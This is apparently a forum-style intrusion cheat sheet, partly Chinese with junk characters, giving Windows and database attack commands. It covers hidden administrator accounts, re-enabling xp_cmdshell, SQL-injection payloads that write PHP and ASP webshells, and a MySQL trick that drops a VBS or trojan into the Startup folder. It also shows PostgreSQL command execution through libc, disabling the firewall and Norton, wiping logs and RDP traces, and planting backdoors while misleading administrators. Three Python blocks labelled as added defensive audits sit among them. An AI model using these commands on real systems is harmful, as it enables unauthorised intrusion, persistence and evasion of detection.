" O4 Q2 G0 O+ i# c' J. M$ V
1.net user administrator /passwordreq:no
4 C) @; x8 w# t! b: ?4 v这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了9 p& s5 B- p$ A+ }3 U
2. A fairly neat way to build a clone account:
First create an ordinary user account.
Then export its registry entry, and delete the account in Computer Management.
Then import the registry entry again and add the account to the Administrators group.
3. Reading the radmin password
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
4. [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]
Create a subkey named "services.exe",
then create a string value under it
whose data is the full path of the trojan.
5. runas /user:guest cmd
Tests a user's privileges.
6. tlntadmn config sec = -ntlm
exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'--
This actually uses the tlntadmn command; run it with /? for details (it requires administrator privileges). Creating an identical user and then passing NTLM authentication needs no explanation.
7. After the intrusion: patching holes, cleaning traces, placing backdoors:
Basic vulnerabilities must be patched, such as SU privilege escalation and SA injection. For DBO injection consider removing xp_treelist and xp_regread (remember the web directory yourself). You must clean up your traces. For SQL Server connections, Enterprise Manager is preferable; Query Analyzer leaves records under HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers, so delete them. When clearing IIS logs, do not use AIO-type tools that wipe the logs completely; use a logcleaner-type tool that removes only the records for a specified IP. If you can get the administrator password through GINA, log in as the administrator to clean the logs and do the final trace cleanup with WYWZ. That said, manual cleanup is safer. Finally leave a backdoor that produces no log entries: several one-line backdoors, a standard backdoor and a cfm backdoor are what I usually leave at minimum. Remember to fix up the timestamps. One nastier trick: if the machine is just an ordinary zombie, drop a TXT on the administrator's desktop telling him you broke in, placed a certain backdoor and added a certain user (not your real, important backdoor, of course) and asking him to clean it up. That way there is a good chance your real backdoor survives.
8. declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c

for example

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators aptime /add'

9. MSSQL Server 2005 has xp_cmdshell switched off by default.
To enable it you must turn on advanced options.
This can be injected directly at the injection point:
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
then ;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
or
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
to restore cmdshell.

In Query Analyzer:
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
then ;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
10. A new way to restore xp_cmdshell
After the extended stored procedure has been dropped, there is a very simple way to restore it:
Removal:
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'

Restore:
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")

This restores it directly, regardless of whether sp_addextendedproc still exists.
-----------------------------

Statement to drop the extended stored procedure xp_cmdshell:
exec sp_dropextendedproc 'xp_cmdshell'
SQL statement to restore cmdshell:
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

SQL statement to enable cmdshell:
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
Check whether the extended stored procedure exists:
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
A result of 1 means it is there.

Restore xp_cmdshell:
exec master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
A result of 1 means it worked.

Otherwise upload xplog70.dll and run:
exec master.dbo.sp_addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'

SQL statement to block cmdshell:
sp_dropextendedproc 'xp_cmdshell'
-------------------------
Clear the 3389 login records with a single built-in command:
reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f

Then delete the Default.rdp file in the current account's My Documents folder.
View the current user's privileges in MySQL:
show grants for 

The following statements give privileges identical to the ROOT user. You have probably run into this when taking a site: MySQL's root user may only connect locally and rejects external connections. The following method solves that. The statements below create a user itpro with password 123 and the same privileges as root, allowed to connect from any host, so you can conveniently operate the database remotely from your own machine.

Create USER 'itpro'@'%' IDENTIFIED BY '123';

GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123' WITH GRANT OPTION
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
MAX_UPDATES_PER_HOUR 0 MAX_USER_CONNECTIONS 0;

When you are done, remember to remove your footprints.
Drop USER 'itpro'@'%';

Drop DATABASE IF EXISTS `itpro` ;
Getting SYSTEM privileges as the current user:
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact
sc start SuperCMD

Code:
<SCRIPT LANGUAGE="VBScript">
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","nosec")
od.SetPassword "123456abc!@#"
od.SetInfo
Set of=GetObject(os&"/nosec,user")
oe.add os&"/nosec"
</Script>
<script language=javascript>window.close();</script>

Bypassing the CAPTCHA limit to get into the back end and obtain a shell
Code:
REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
"BlockXBM"=dword:00000000

Save as code.reg, import it into the registry and restart IE;
that is all it takes.
Writing a shell with UNION
Code:
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*

Applied to the dedecms injection vulnerability: writing a shell without the back end.
In the dedecms back end, when there is no file manager and no outfile privilege,
go to Plugin Management - Virus Scan
and write a one-liner into include/config_hand.php:
Code:
>';?><?php @eval($_POST[cmd]);?>

in the format above.
In Oracle, after logging in with a low-privilege user you can run the following to query the hashes of sys and other users, then crack them with Cain:
Code:
select username,password from dba_users;

MySQL remote-connection user
Code:
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
MAX_UPDATES_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
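Both MySQL snippets above (the itpro and the nosec account) leave behind an account reachable from any host with root-equivalent rights and GRANT OPTION, which is exactly what an administrator should be looking for in SHOW GRANTS output. The following audit is an added example, not code from the original notes; the grant lines it parses are constructed sample input, and the finding names are my own.

```python
import re

# Added defensive example: classify SHOW GRANTS lines for accounts like the
# 'itpro'@'%' / 'nosec'@'%' grants in the notes. Sample input is constructed.

GRANT_LINE = re.compile(
    r"^GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<scope>\S+)\s+TO\s+"
    r"(?P<user>'[^']*'|`[^`]*`)@(?P<host>'[^']*'|`[^`]*`)(?P<rest>.*)$",
    re.IGNORECASE,
)
DANGEROUS = {"SUPER", "FILE"}   # FILE is what 'into outfile' writes depend on


def audit_grant(line):
    """Return the set of findings for one SHOW GRANTS line (empty if it looks benign)."""
    m = GRANT_LINE.match(line.strip().rstrip(";"))
    if not m:
        return set()
    findings = set()
    host = m.group("host").strip("'`")
    privs = {p.strip().upper() for p in m.group("privs").split(",")}
    rest = m.group("rest").upper()
    if "%" in host:                                   # any host, or a whole range
        findings.add("wildcard-host")
    if privs & {"ALL", "ALL PRIVILEGES"} and m.group("scope") == "*.*":
        findings.add("global-all")                    # root-equivalent account
    elif privs & DANGEROUS:
        findings.add("dangerous-priv")
    if "WITH GRANT OPTION" in rest:
        findings.add("grant-option")                  # can hand out its rights
    return findings


def audit_grants(lines):
    """Map each account that has at least one finding to its sorted findings."""
    report = {}
    for line in lines:
        m = GRANT_LINE.match(line.strip().rstrip(";"))
        if not m:
            continue
        found = audit_grant(line)
        if found:
            account = f"{m.group('user')}@{m.group('host')}"
            report.setdefault(account, set()).update(found)
    return {acct: sorted(f) for acct, f in report.items()}


# Constructed sample of SHOW GRANTS output (pre-5.7 style with a placeholder hash).
SAMPLE_GRANTS = [
    "GRANT USAGE ON *.* TO 'itpro'@'%' IDENTIFIED BY PASSWORD '*CONSTRUCTED'",
    "GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' WITH GRANT OPTION",
    "GRANT SELECT, INSERT ON `forum`.* TO 'web'@'localhost'",
    "GRANT SELECT, FILE ON *.* TO 'report'@'10.0.0.%'",
]

if __name__ == "__main__":
    for account, findings in audit_grants(SAMPLE_GRANTS).items():
        print(account, ", ".join(findings))
```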

echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0

1. Query the terminal services port

XP & 2003: REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber

Generic: regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
type tsp.reg

2. Enable terminal services on XP & 2003

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

3. Change the terminal services port to 20008 (0x4E28)

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f

4. Remove the XP & 2003 firewall restriction on terminal services port 3389 and on connecting IPs

REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled:@xpsp2res.dll,-22009 /f

5. Enable the terminal service on Win2000, port 3389 (reboot required)

echo Windows Registry Editor Version 5.00 >2000.reg
echo. >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
echo "Enabled"="0" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
echo "ShutdownWithoutLogon"="0" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
echo "TSEnabled"=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
echo "Start"=dword:00000002 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
echo "Start"=dword:00000002 >>2000.reg
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
echo "Hotkey"="1" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
echo "PortNumber"=dword:00000D3D >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
echo "PortNumber"=dword:00000D3D >>2000.reg

6. Force a reboot of Win2000 & Win2003 (the system reboots automatically after the last line executes)

@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
(set inf=InstallHinfSection DefaultInstall)
echo signature=$chicago$ >> restart.inf
echo [defaultinstall] >> restart.inf
rundll32 setupapi,%inf% 1 %temp%\restart.inf

7. Disable TCP/IP port filtering (reboot required)

REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f

8. When the terminal server has exceeded its maximum number of connections, use the following command to connect
mstsc /v:ip:3389 /console

9. Adjust NTFS partition permissions

cacls c: /e /t /g everyone:F (everyone gets full control of drive C)
cacls %systemroot%\system32\*.exe /d everyone (deny everyone access to the exe files in system32)
------------------------------------------------------
3389.vbs
On Error Resume Next
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set StdOut = WScript.StdOut
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
strComputer & "\root\default:StdRegProv")
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
strValueName = "fDenyTSConnections"
dwValue = 0
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
strValueName = "PortNumber"
dwValue = 3389
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strValueName = "PortNumber"
dwValue = 3389
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
Set R = CreateObject("WScript.Shell")
R.run("Shutdown.exe -f -r -t 0")

Delete the registry value for awgina.dll
Code:

reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f

Code:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
Set it to 1 to disable LM hashes.
Database security: common commands for attacking Oracle databases
Recently I ran into a server running Oracle. After cramming Oracle and consulting some experts I finally got every user password of the site's back-end admin interface. I found Oracle really painful to operate, so to save you some detours I have collected the commands needed during an intrusion.
1. su - oracle: not required; useful when you have no DBA password, since it lets you enter the sqlplus interface without a password.
2. sqlplus /nolog, or sqlplus system/manager, or ./sqlplus system/manager@ora9i;
3. SQL>connect / as sysdba; (as sysoper) or
connect internal/oracle AS SYSDBA; (scott/tiger)
conn sys/change_on_install as sysdba;
4. SQL>startup; starts the database instance
5. View all current databases: select * from v$database;
select name from v$database;
6. desc v$database; view the database structure fields
7. How to see which users have SYSDBA or SYSOPER privileges:
SQL>select * from V_$PWFILE_USERS;
Show user; shows the current database connection user
8. Enter the test database: database test;
9. View all database instances: select * from v$instance;
e.g. ora9i
10. View all tables in the current database:
SQL> select TABLE_NAME from all_tables;
select * from all_tables;
SQL> select table_name from all_tables where table_name like '%u%';
TABLE_NAME
------------------------------
_default_auditing_options_
11. View a table's structure: desc all_tables;
12. Show the structure of all fields of CQI.T_BBS_XUSER:
desc CQI.T_BBS_XUSER;
13. Get the records in the CQI.T_BBS_XUSER table:
select * from CQI.T_BBS_XUSER;
14. Add a database user: (test11/test)
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
15. Grant privileges to the user:
grant connect,resource,dba to test11;
grant sysdba to test11;
commit;
16. Change a database user's password: (change the sys and system passwords to test)
alter user sys identified by test;
alter user system identified by test;
applicationContext-util.xml
applicationContext.xml
struts-config.xml
web.xml
server.xml
tomcat-users.xml
hibernate.cfg.xml
database_pool_config.xml

\WEB-INF\classes\hibernate.cfg.xml: database connection configuration
\WEB-INF\server.xml: similar to http.conf + mysql.ini + php.ini
\WEB-INF\struts-config.xml: file and directory structure

spring.properties contains the name of the hibernate.cfg.xml

C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml

If none of these can be found, look at the class files.
Viewing shared folders inside a virtual machine:
Run in cmd inside the VM:
\\.host\Shared Folders

Tricks for finding the terminal service port from cmdshell:
Finding the terminal port:
Step 1: Tasklist /SVC lists all processes and system services with their PIDs.
The service name for terminal services is TermService.
Step 2: use netstat -ano to list the PID for every port,
and find the port that corresponds to that PID.

Querying password hashes in SQL Server 2005:
SELECT password_hash FROM sys.sql_logins where name='sa'
Complete code for adding a user through MySQL on a Chinese-language operating system:

use test;
create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
drop table a;

English version:

use test;
create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
drop table a;

create table a (cmd BLOB);
insert into a values (CONVERT(<hex code of the trojan>,CHAR));
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\mm.exe'
drop table a;
Notes on dealing with that awkward Norton
Look up the path of the Norton service:
sc qc ccSetMgr
Then set permissions to deny access. Go all the way:
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone

Then restart the server:
iisreset /reboot
That takes care of it. But when you are finished, remember to restore the permissions:
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')

" x2 I. q9 ~7 w8 Fpostgresql注射的一些东西
5 S3 r. S0 D$ ~如何获得webshell% r1 q$ n: X# x T9 X: j- E, E4 o
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
% ?- T8 H8 I* A6 X" V! l1 chttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
, n6 f# o' V& H$ T1 d/ D. bhttp://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
! M* P! w9 }" K5 q; |$ ?# }, k如何读文件
* e- `/ Q( g+ G- shttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
3 S* o B0 P( E( D N# s dhttp://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;* V1 L& j& d$ M: @3 \
http://127.0.0.1/postgresql.php?id=1;select * from myfile;
+ G |; [4 W, R/ J5 H- S; n3 T5 s1 b
z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。- w. T' Z) T6 b: T6 `6 f5 V
当然,这些的postgresql的数据库版本必须大于8.X
; t6 H' k7 d H+ M \, e创建一个system的函数:* o/ @/ U& P9 P5 L
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
F" U3 }- U6 N7 N. i9 q: j, W! a6 t
- ?, V i& [: ^7 \0 @创建一个输出表:3 c. f8 z! Q) Y" n6 ~5 | b7 Y
CREATE TABLE stdout(id serial, system_out text)
5 v" [. T I5 s: b! |" `$ z4 F' ]) N
执行shell,输出到输出表内:
% S V9 M' F' B' ~; fSELECT system('uname -a > /tmp/test')- b( C2 s0 h" n% T
& f9 o- t/ l9 a% m9 u! m, J
copy 输出的内容到表里面;
5 f: b4 R" ?# X8 Z. A! ]3 ]COPY stdout(system_out) FROM '/tmp/test') ~; Z( N6 e; i) s! T" G' I! j
& d. z# C. y( {" J5 s3 X* C从输出表内读取执行后的回显,判断是否执行成功7 E4 `' K6 J- k) B i) t
+ P# a$ V, t. E' i0 I2 BSELECT system_out FROM stdout
4 P! z6 P. R9 ?下面是测试例子
0 o* X: l; p G1 Q( ~- a, |$ S3 N" d( q
% x. U, B8 i; B7 h2 m# X% q/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
. ]' x2 K$ _4 H4 B; {6 A9 q
1 |4 g" ^% i, q# o$ A9 a/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
/ P! B0 b% q0 k( m$ A* |# ?: MSTRICT --
, y) y+ d) {" p
: N* ~. k& P( y3 U5 ^& ~/store.php?id=1; SELECT system('uname -a > /tmp/test') --5 J! d& c% G+ M2 l3 Z2 Y& G
7 Q6 |3 a) `5 X5 y! Z# o/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
% r* {1 a/ L) O/ B$ o
$ C" f5 g e& e: Y% P% A/ ?/ C/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
net stop sharedaccess                              stops the default firewall
netsh firewall show                                show/config the default firewall
netsh firewall set notifications disable           disables the notification when a program is blocked by the default firewall
netsh firewall add allowedprogram c:\1.exe Svchost adds a program allowed through the default firewall
Changing the 3389 port (harder to find by scanning after the change)
Change the server-side port setting; two places in the registry need modifying:

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]
PortNumber value, default 3389; change it to the desired port, e.g. 6000

Second place:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
PortNumber value, default 3389; change it to the desired port, e.g. 6000

That is all; reboot the system and it takes effect.
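The same two PortNumber values (and fDenyTSConnections) are what an administrator checks when looking for RDP that was quietly enabled or moved to a non-default port, and the notes above already show how to dump them with regedit /e tsp.reg. The parser below is an added example, not code from the original notes; the export text is a constructed sample using the 0x4E28 (20008) port from the notes, and real exports are UTF-16 files, so open them with encoding="utf-16".

```python
import re

# Added defensive example: parse a "regedit /e" export of the Terminal Server keys
# and summarise whether RDP is enabled and which port(s) it is configured on.
# SAMPLE_EXPORT is constructed; it is not a dump from any real machine.

SAMPLE_EXPORT = """\
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server]
"fDenyTSConnections"=dword:00000000

[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp]
"PortNumber"=dword:00004e28

[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]
"PortNumber"=dword:00004e28
"""

DEFAULT_RDP_PORT = 3389
TS_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"
KEY_LINE = re.compile(r"^\[(?P<key>[^\]]+)\]$")
DWORD_LINE = re.compile(r'^"(?P<name>[^"]+)"=dword:(?P<hex>[0-9a-fA-F]{8})$')


def parse_reg_export(text):
    """Return {key path: {value name: int}} for the REG_DWORD values in a .reg export."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = KEY_LINE.match(line)
        if m:
            current = m.group("key")
            keys.setdefault(current, {})
            continue
        m = DWORD_LINE.match(line)
        if m and current is not None:
            # dword data is written as eight hex digits, little-endian already resolved
            keys[current][m.group("name")] = int(m.group("hex"), 16)
    return keys


def audit_terminal_server(keys):
    """Summarise the RDP settings: both PortNumber locations should agree and be 3389."""
    ports = {
        "Wds\\rdpwd\\Tds\\tcp": keys.get(TS_KEY + "\\Wds\\rdpwd\\Tds\\tcp", {}).get("PortNumber"),
        "WinStations\\RDP-Tcp": keys.get(TS_KEY + "\\WinStations\\RDP-Tcp", {}).get("PortNumber"),
    }
    seen = {p for p in ports.values() if p is not None}
    return {
        "rdp_enabled": keys.get(TS_KEY, {}).get("fDenyTSConnections") == 0,
        "ports": ports,
        "nonstandard_ports": sorted(p for p in seen if p != DEFAULT_RDP_PORT),
        "ports_disagree": len(seen) > 1,   # only one of the two keys was changed
    }


if __name__ == "__main__":
    print(audit_terminal_server(parse_reg_export(SAMPLE_EXPORT)))
```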
Script for viewing 3389 remote logins
Save it as a .bat file:
date /t >>D:\sec\TSlog\ts.log
time /t >>D:\sec\TSlog\ts.log
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
start Explorer
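The batch file above only appends raw netstat lines; to act on it you need to tie each connection back to the date/time stamp that precedes it and pick out peers that should not be there. The parser below is an added example, not code from the original notes; the log text and IP ranges are constructed sample input, and the allowed management network is an assumption.

```python
import ipaddress
import re
from collections import Counter

# Added defensive example: parse the ts.log written by the batch file (a date /t
# line, a time /t line, then the netstat lines that contain ":3389") and report
# RDP peers outside an allowed management range. TS_LOG is constructed sample data.

TS_LOG = """\
Mon 07/18/2011
04:00 AM
  TCP    10.0.0.5:3389          10.0.0.20:49210        ESTABLISHED
Mon 07/18/2011
04:05 AM
  TCP    10.0.0.5:3389          10.0.0.20:49210        ESTABLISHED
  TCP    10.0.0.5:3389          203.0.113.77:51234     ESTABLISHED
  TCP    10.0.0.5:3389          203.0.113.77:51240     TIME_WAIT
  TCP    10.0.0.5:52001         10.0.0.9:3389          ESTABLISHED
Mon 07/18/2011
04:10 AM
"""

TCP_LINE = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+(\S+):(\d+)\s+(\S+)\s*$")


def parse_ts_log(text):
    """Return one dict per netstat line, stamped with the preceding date /t and time /t lines."""
    entries, stamp_parts = [], []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = TCP_LINE.match(line)
        if m is None:
            # a new date line after a complete (date, time) pair starts a new block;
            # this also copes with blocks that logged no connections at all
            if len(stamp_parts) >= 2:
                stamp_parts = []
            stamp_parts.append(line)
            continue
        local_ip, local_port, remote_ip, remote_port, state = m.groups()
        entries.append({
            "stamp": " ".join(stamp_parts),
            "local": f"{local_ip}:{local_port}",
            "remote_ip": remote_ip,
            "remote_port": int(remote_port),
            "state": state,
            # find ":3389" also matches RDP going *out* from this host (local port != 3389)
            "direction": "inbound" if local_port == "3389" else "outbound",
        })
    return entries


def unexpected_rdp_peers(entries, allowed_networks):
    """Count ESTABLISHED inbound RDP sessions per remote IP outside the allowed networks."""
    nets = [ipaddress.ip_network(n) for n in allowed_networks]
    peers = Counter()
    for e in entries:
        if e["state"] != "ESTABLISHED" or e["direction"] != "inbound":
            continue
        if not any(ipaddress.ip_address(e["remote_ip"]) in n for n in nets):
            peers[e["remote_ip"]] += 1
    return peers


def outbound_rdp(entries):
    """Outbound RDP from a server is worth a look on its own: it can be lateral movement."""
    return [(e["stamp"], e["remote_ip"]) for e in entries
            if e["direction"] == "outbound" and e["state"] == "ESTABLISHED"]


if __name__ == "__main__":
    parsed = parse_ts_log(TS_LOG)
    # assumption: 10.0.0.0/24 is the management network allowed to use RDP
    print(unexpected_rdp_peers(parsed, ["10.0.0.0/24"]))
    print(outbound_rdp(parsed))
```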

mstsc parameters:

Remote Desktop Connection

MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
 [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?

<Connection File> -- specifies the name of the .rdp file for the connection.

/v:<server[:port]> -- specifies the terminal server to connect to.

/console -- connects to the console session of the server.

/f -- starts the client in full-screen mode.

/w:<width> -- specifies the width of the remote desktop screen.

/h:<height> -- specifies the height of the remote desktop screen.

/edit -- opens the specified .rdp file for editing.

/migrate -- migrates legacy connection files created with Client Connection Manager
to new .rdp connection files.

mstsc /console connects to session 0, whereas plain mstsc opens a separate virtual session, which is equivalent to another logon to the computer. In other words, connecting with the console parameter gives you the desktop shown on the monitor. Try it; it comes in handy sometimes, especially with some software
mstsc /console /v:124.42.126.xxx bypasses the limit on the number of terminal connections
Enabling 3389 from the command line
net user asp.net aspnet /add
net localgroup Administrators asp.net /add
net localgroup "Remote Desktop Users" asp.net /add
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
